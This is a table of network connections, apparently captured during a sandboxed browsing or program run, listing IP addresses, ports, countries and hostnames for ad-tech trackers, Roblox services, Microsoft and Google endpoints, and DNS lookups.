| US | 13.227.146.154:443 | aax.amazon-adsystem.com | tcp |
| IE | 52.51.104.112:443 | bcp.crwdcntrl.net | tcp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 69.166.1.64:443 | apex.go.sonobi.com | tcp |
| NL | 147.75.81.235:443 | prebid.a-mo.net | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.157.230.4:443 | tlx.3lift.com | tcp |
| US | 104.18.34.190:443 | elb.the-ozone-project.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| IE | 54.229.112.66:443 | track.venatusmedia.com | tcp |
| US | 34.95.69.49:443 | i.clean.gg | udp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | 112.104.51.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.146.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.111.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.34.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.167.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.230.157.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.60.197.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.152.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.229.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.84.255.185.in-addr.arpa | udp |
| NL | 147.75.81.235:443 | prebid.a-mo.net | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| IE | 18.200.223.87:443 | s.cpx.to | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| GB | 185.64.191.210:443 | image2.pubmatic.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | udp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| FR | 142.250.75.226:443 | ep1.adtrafficquality.google | tcp |
| FR | 142.250.179.65:443 | f0bcf6eb4f7e278fafc4e5c4bd8204ee.safeframe.googlesyndication.com | tcp |
| GB | 23.214.142.107:443 | tg1.aniview.com | tcp |
| FR | 142.250.179.97:443 | ep2.adtrafficquality.google | tcp |
| GB | 2.17.209.125:443 | feed.avplayer.com | tcp |
| US | 172.240.45.75:443 | track4.aniview.com | tcp |
| GB | 92.123.143.216:443 | player.aniview.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| FR | 185.93.2.246:443 | cdn1.vntsm.com | tcp |
| NL | 178.250.1.9:443 | dis.eu.criteo.com | tcp |
| FR | 142.250.178.129:443 | tpc.googlesyndication.com | tcp |
| FR | 142.250.179.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 65.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.142.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.209.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| GB | 92.123.143.216:443 | content1.avplayer.com | tcp |
| GB | 92.123.143.216:443 | content1.avplayer.com | tcp |
| GB | 23.214.142.107:443 | tg1.aniview.com | tcp |
| IE | 63.32.228.210:443 | rtb.gumgum.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 50.31.142.191:443 | b1sync.zemanta.com | tcp |
| FR | 142.250.179.68:443 | www.google.com | udp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| FR | 142.250.179.68:443 | www.google.com | tcp |
| US | 172.240.45.76:443 | track1.avplayer.com | tcp |
| IE | 63.32.228.210:443 | rtb.gumgum.com | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| DE | 18.197.30.174:443 | match.sharethrough.com | tcp |
| GB | 2.18.108.192:443 | ads.pubmatic.com | tcp |
| IE | 34.252.171.241:443 | ms-cookie-sync.presage.io | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| GB | 95.100.245.251:443 | eus.rubiconproject.com | tcp |
| NL | 89.149.193.84:443 | ssbsync.smartadserver.com | tcp |
| US | 172.240.45.75:443 | track4.aniview.com | udp |
| DE | 37.252.171.85:443 | secure.adnxs.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | tcp |
| DK | 37.157.3.26:443 | c1.adform.net | tcp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| NL | 188.42.189.231:443 | ads.betweendigital.com | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| JP | 211.120.53.202:443 | tg.socdm.com | tcp |
| US | 34.98.64.218:443 | us-u.openx.net | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| GB | 23.214.129.249:443 | secure-assets.rubiconproject.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| IE | 18.200.154.164:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 34.98.64.218:443 | us-u.openx.net | udp |
| JP | 211.120.53.202:443 | tg.socdm.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| US | 52.73.51.45:443 | sync.ipredictive.com | tcp |
| IE | 52.18.134.220:443 | ce.lijit.com | tcp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.129.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.53.120.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.154.200.18.in-addr.arpa | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 38.91.45.7:443 | match.deepintent.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| FR | 142.250.178.129:443 | tpc.googlesyndication.com | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| IE | 108.128.33.72:443 | ice.360yield.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| NL | 69.173.156.149:443 | pixel-eu.rubiconproject.com | tcp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| GB | 128.116.119.4:443 | auth.roblox.com | tcp |
| GB | 128.116.119.4:443 | auth.roblox.com | tcp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| GB | 92.123.142.144:443 | acdn.adnxs.com | tcp |
| US | 104.18.34.190:443 | elb.the-ozone-project.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | udp |
| GB | 128.116.119.4:443 | auth.roblox.com | tcp |
| IE | 54.72.42.145:443 | sync.crwdcntrl.net | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| NL | 147.75.81.235:443 | prebid.a-mo.net | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| FR | 172.217.20.162:443 | googleads.g.doubleclick.net | tcp |
| US | 52.6.202.249:443 | sync.srv.stackadapt.com | tcp |
| US | 104.17.43.93:443 | gum.aidemsrv.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | 4.119.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.42.72.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssc-cms.33across.com | udp |
| US | 67.202.105.23:443 | ssc-cms.33across.com | tcp |
| GB | 92.123.143.216:443 | content1.avplayer.com | tcp |
| US | 104.17.43.93:443 | gum.aidemsrv.com | tcp |
| GB | 92.123.143.106:443 | static.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| US | 18.214.118.225:443 | cs-server-s2s.yellowblue.io | tcp |
| GB | 128.116.119.4:443 | metrics.roblox.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| US | 3.222.152.35:443 | api-2-0.spot.im | tcp |
| US | 172.67.40.173:443 | mwzeom.zeotap.com | tcp |
| US | 8.8.8.8:53 | 225.118.214.18.in-addr.arpa | udp |
| FR | 54.36.150.183:443 | cookie-matching.mediarithmics.com | tcp |
| US | 69.166.1.35:443 | sync.go.sonobi.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 216.200.232.249:443 | sync.mathtag.com | tcp |
| US | 34.128.133.112:443 | ads.avads.net | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 172.240.45.78:443 | sync.aniview.com | tcp |
| NL | 35.214.132.90:443 | u.ipw.metadsp.co.uk | tcp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| GB | 92.123.140.97:443 | apis.rbxcdn.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| NL | 35.204.158.49:443 | um.simpli.fi | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| DE | 168.119.72.236:443 | sync.richaudience.com | tcp |
| IE | 52.212.121.90:443 | ap.lijit.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | udp |
| IE | 52.215.131.87:443 | match.prod.bidr.io | tcp |
| US | 52.6.202.249:443 | sync.srv.stackadapt.com | tcp |
| US | 52.6.202.249:443 | sync.srv.stackadapt.com | tcp |
| NL | 35.214.132.90:443 | u.ipw.metadsp.co.uk | udp |
| NL | 89.149.193.84:443 | ssbsync.smartadserver.com | tcp |
| DE | 18.197.30.174:443 | match.sharethrough.com | tcp |
| US | 209.54.182.161:443 | s.amazon-adsystem.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync.smartadserver.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync.smartadserver.com | tcp |
| FR | 154.54.250.81:443 | ads.stickyadstv.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| DE | 168.119.72.236:443 | sync.richaudience.com | tcp |
| FR | 142.250.179.74:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 90.132.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.158.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.121.212.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.131.215.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.178.182.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.182.54.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.250.54.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 172.240.45.76:443 | track1.avplayer.com | udp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 172.240.45.78:443 | sync.aniview.com | udp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| US | 69.166.1.35:443 | sync.go.sonobi.com | tcp |
| US | 216.200.232.249:443 | sync.mathtag.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| US | 192.132.33.68:443 | bttrack.com | tcp |
| GB | 185.64.190.81:443 | image4.pubmatic.com | tcp |
| DE | 18.197.30.174:443 | match.sharethrough.com | tcp |
| IE | 52.215.131.87:443 | match.prod.bidr.io | tcp |
| NL | 35.214.169.131:443 | csync.loopme.me | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| IE | 52.30.33.234:443 | cs.yellowblue.io | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| DE | 80.82.210.217:443 | dsp-cookie.adfarm1.adition.com | tcp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| DK | 77.243.51.121:443 | uipglob.semasio.net | tcp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | udp |
| DE | 3.124.210.90:443 | ps.eyeota.net | tcp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| NL | 35.214.169.131:443 | csync.loopme.me | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| IE | 52.18.134.220:443 | ce.lijit.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| NL | 64.227.64.62:443 | match.adsby.bidtheatre.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 188.42.63.48:443 | dsp-ap.eskimi.com | tcp |
| NL | 64.158.223.137:443 | pubmatic-match.dotomi.com | tcp |
| FR | 54.36.150.183:443 | cookie-matching.mediarithmics.com | tcp |
| US | 8.8.8.8:53 | 90.210.124.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.64.227.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.63.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 172.64.146.152:443 | capi.connatix.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | udp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | udp |
| US | 172.111.38.86:443 | tracker.open-adsyield.com | tcp |
| US | 52.73.51.45:443 | sync.ipredictive.com | tcp |
| PL | 18.66.233.19:443 | live.primis.tech | tcp |
| FR | 54.38.113.2:443 | pixel-eu.onaudience.com | tcp |
| SE | 192.229.221.95:80 | cacerts.rapidssl.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| NL | 35.214.169.131:443 | csync.loopme.me | tcp |
| SE | 13.53.196.230:443 | d5p.de17a.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| IE | 3.248.76.205:443 | pm.w55c.net | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| IE | 52.215.155.11:443 | cm.adgrx.com | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| FR | 141.95.171.140:443 | green.erne.co | tcp |
| US | 172.64.150.63:443 | a.tribalfusion.com | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| FR | 54.38.113.8:443 | pixel-eu.onaudience.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 63.150.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.120.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.113.38.54.in-addr.arpa | udp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | udp |
| GB | 128.116.119.8:443 | lms.roblox.com | tcp |
| US | 8.8.8.8:53 | aws-eu-central-1c-lms.rbx.com | udp |
| US | 128.116.32.3:443 | lga2-128-116-32-3.roblox.com | tcp |
| US | 128.116.102.3:443 | iad4-128-116-102-3.roblox.com | tcp |
| HK | 18.163.23.88:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| NL | 128.116.21.3:443 | ams2-128-116-21-3.roblox.com | tcp |
| DE | 52.28.16.152:443 | aws-eu-central-1c-lms.rbx.com | tcp |
| GB | 108.156.46.104:443 | c0aws.rbxcdn.com | tcp |
| SG | 128.116.50.3:443 | sin4-128-116-50-3.roblox.com | tcp |
| IN | 128.116.104.4:443 | bom1-128-116-104-4.roblox.com | tcp |
| US | 128.116.101.3:443 | ord2-128-116-101-3.roblox.com | tcp |
| HK | 18.163.23.88:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| NL | 128.116.21.3:443 | ams2-128-116-21-3.roblox.com | tcp |
| DE | 52.28.16.152:443 | aws-eu-central-1c-lms.rbx.com | tcp |
| GB | 108.156.46.104:443 | c0aws.rbxcdn.com | tcp |
| SG | 128.116.50.3:443 | sin4-128-116-50-3.roblox.com | tcp |
| IN | 128.116.104.4:443 | bom1-128-116-104-4.roblox.com | tcp |
| FR | 142.250.179.74:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 104.46.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.16.28.52.in-addr.arpa | udp |
| GB | 128.116.119.8:443 | lms.roblox.com | tcp |
| US | 69.166.1.64:443 | apex.go.sonobi.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| DE | 37.252.172.123:443 | secure.adnxs.com | tcp |
| US | 69.166.1.64:443 | apex.go.sonobi.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| DE | 37.252.172.123:443 | secure.adnxs.com | tcp |
| FR | 216.58.215.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 35.157.229.52:443 | 1x1.a-mo.net | tcp |
| DE | 35.157.229.52:443 | 1x1.a-mo.net | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| GB | 18.245.187.105:443 | ib.3lift.com | tcp |
| GB | 18.245.187.105:443 | ib.3lift.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 18.244.114.69:443 | t3.rbxcdn.com | tcp |
| GB | 18.245.187.105:443 | ib.3lift.com | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 52.73.51.45:443 | sync.ipredictive.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 204.79.197.237:443 | c.bing.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 204.79.197.237:443 | c.bing.com | tcp |
| IE | 52.215.131.87:443 | match.prod.bidr.io | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.9:443 | widget.nl3.eu.criteo.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | voice.roblox.com | udp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| US | 8.8.8.8:53 | silver.roblox.com | udp |
| US | 8.8.8.8:53 | cdg1-128-116-122-3.roblox.com | udp |
| US | 8.8.8.8:53 | mia2-128-116-127-3.roblox.com | udp |
| US | 8.8.8.8:53 | c0ak.rbxcdn.com | udp |
| US | 8.8.8.8:53 | aws-eu-west-2a-lms.rbx.com | udp |
| US | 8.8.8.8:53 | atl1-128-116-99-3.roblox.com | udp |
| US | 8.8.8.8:53 | aws-ap-east-1b-lms.rbx.com | udp |
| US | 8.8.8.8:53 | c0.rbxcdn.com | udp |
| GB | 18.130.200.10:443 | aws-eu-west-2b-lms.rbx.com | tcp |
| GB | 128.116.119.3:443 | silver.roblox.com | tcp |
| GB | 92.123.140.73:443 | c0.rbxcdn.com | tcp |
| GB | 92.123.142.235:443 | c0.rbxcdn.com | tcp |
| GB | 13.40.255.29:443 | aws-eu-west-2a-lms.rbx.com | tcp |
| FR | 128.116.122.3:443 | cdg1-128-116-122-3.roblox.com | tcp |
| US | 128.116.127.3:443 | mia2-128-116-127-3.roblox.com | tcp |
| US | 128.116.99.3:443 | atl1-128-116-99-3.roblox.com | tcp |
| HK | 16.163.186.39:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| NL | 89.207.16.204:443 | triplelift-match.dotomi.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | udp |
| GB | 18.130.200.10:443 | aws-eu-west-2b-lms.rbx.com | tcp |
| GB | 128.116.119.3:443 | silver.roblox.com | tcp |
| HK | 16.163.186.39:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| NL | 178.250.1.9:443 | widget.nl3.eu.criteo.com | tcp |
| US | 50.31.142.191:443 | b1sync.zemanta.com | tcp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| DE | 37.252.172.123:443 | secure.adnxs.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync.smartadserver.com | tcp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| NL | 141.226.228.48:443 | sync-t1.taboola.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| NL | 141.226.228.48:443 | sync-t1.taboola.com | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| US | 104.18.36.155:443 | r.casalemedia.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | jadserve.postrelease.com | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 8.8.8.8:53 | ad.yieldlab.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| GB | 128.116.119.4:443 | client-telemetry.roblox.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| N/A | 127.0.0.1:51043 | tcp | |
| GB | 128.116.119.4:443 | client-telemetry.roblox.com | tcp |
| N/A | 127.0.0.1:51075 | tcp | |
| GB | 128.116.119.4:443 | client-telemetry.roblox.com | tcp |
| N/A | 127.0.0.1:51080 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| PL | 18.66.233.25:443 | clientsettingscdn.roblox.com | tcp |
| US | 8.8.8.8:53 | setup.rbxcdn.com | udp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| N/A | 127.0.0.1:51095 | tcp | |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 20.7.47.135:443 | msedge.api.cdp.microsoft.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| US | 8.8.8.8:53 | 135.47.7.20.in-addr.arpa | udp |
| GB | 92.123.140.40:80 | msedge.f.tlu.dl.delivery.mp.microsoft.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| GB | 128.116.119.4:443 | www.roblox.com | tcp |
| GB | 128.116.119.4:443 | www.roblox.com | tcp |
| N/A | 127.0.0.1:51617 | tcp | |
| N/A | 127.0.0.1:51620 | tcp | |
| GB | 104.86.110.98:443 | tcp | |
| GB | 104.86.110.98:443 | tcp | |
| US | 52.168.117.171:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| GB | 104.86.110.98:443 | tcp | |
| GB | 104.86.110.98:443 | tcp | |
| US | 8.8.8.8:53 | r.bing.com | udp |
